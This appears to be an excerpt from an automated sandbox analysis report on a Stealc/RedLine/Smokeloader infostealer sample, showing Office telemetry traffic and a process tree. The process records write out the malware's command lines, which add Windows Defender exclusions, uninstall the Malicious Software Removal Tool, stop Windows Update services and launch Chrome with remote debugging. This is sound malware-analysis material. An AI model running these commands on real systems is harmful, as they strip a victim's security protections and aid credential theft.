                                                                                                                                            2024-10-31 16:13:24 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            146192.168.2.44990413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:24 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:24 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1369
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                            ETag: "0x8DC582BE32FE1A2"
                                                                                                                                            x-ms-request-id: e4f189f6-d01e-005a-18af-2a7fd9000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161324Z-159b85dff8f5bl2qhC1DFWs6cn00000001p000000000bmd0
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            147192.168.2.44990313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:24 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:24 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1406
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                            x-ms-request-id: 626021c1-201e-0085-10af-2a34e3000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161324Z-17c5cb586f6r59nt4rzfbx40ys00000001z000000000dydq
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            148192.168.2.44990513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:24 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:24 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1414
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                            x-ms-request-id: 897ec3ad-201e-005d-0167-27afb3000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161324Z-16849878b787wpl5wqkt5731b40000000ad000000000v1r4
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            149192.168.2.44990713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:25 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:25 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:25 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1377
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                            ETag: "0x8DC582BEAFF0125"
                                                                                                                                            x-ms-request-id: fff585e1-801e-0047-5a39-2a7265000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161325Z-17c5cb586f69dpr98vcd9da8e80000000170000000009axv
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:25 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:12:11:59
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\WGo3ga1AL9.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:721'408 bytes
                                                                                                                                            MD5 hash:61B72B2D4099B7CA2AF5318B4EA6A668
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2313485622.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:12:12:05
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:12:12:06
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                            File size:55'320 bytes
                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:12:12:06
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 --field-trial-handle=2444,i,1816216943429670437,7438663567690844307,262144 /prefetch:8
                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:12:12:39
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\GDBFCGIIIJ.exe"
                                                                                                                                            Imagebase:0x240000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:12:12:39
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:12:12:39
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\ProgramData\GDBFCGIIIJ.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\ProgramData\GDBFCGIIIJ.exe"
                                                                                                                                            Imagebase:0x7ff7739e0000
                                                                                                                                            File size:8'707'480 bytes
                                                                                                                                            MD5 hash:D9A5E741B1F67593422BFB1A165288BB
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:12:12:40
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                            File size:452'608 bytes
                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:12:12:40
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:12:12:42
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                            File size:55'320 bytes
                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:12:12:42
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7308 -ip 7308
                                                                                                                                            Imagebase:0xe70000
                                                                                                                                            File size:483'680 bytes
                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:12:12:42
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 2296
                                                                                                                                            Imagebase:0xe70000
                                                                                                                                            File size:483'680 bytes
                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:12:12:43
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                                                            File size:496'640 bytes
                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                            Imagebase:0x7ff7cf6b0000
                                                                                                                                            File size:289'792 bytes
                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:19
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:20
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\wusa.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                            Imagebase:0x7ff6c10b0000
                                                                                                                                            File size:345'088 bytes
                                                                                                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:21
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:22
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:12:12:44
                                                                                                                                            Start date:31/10/2024
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                            Imagebase:0x7ff76bb80000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
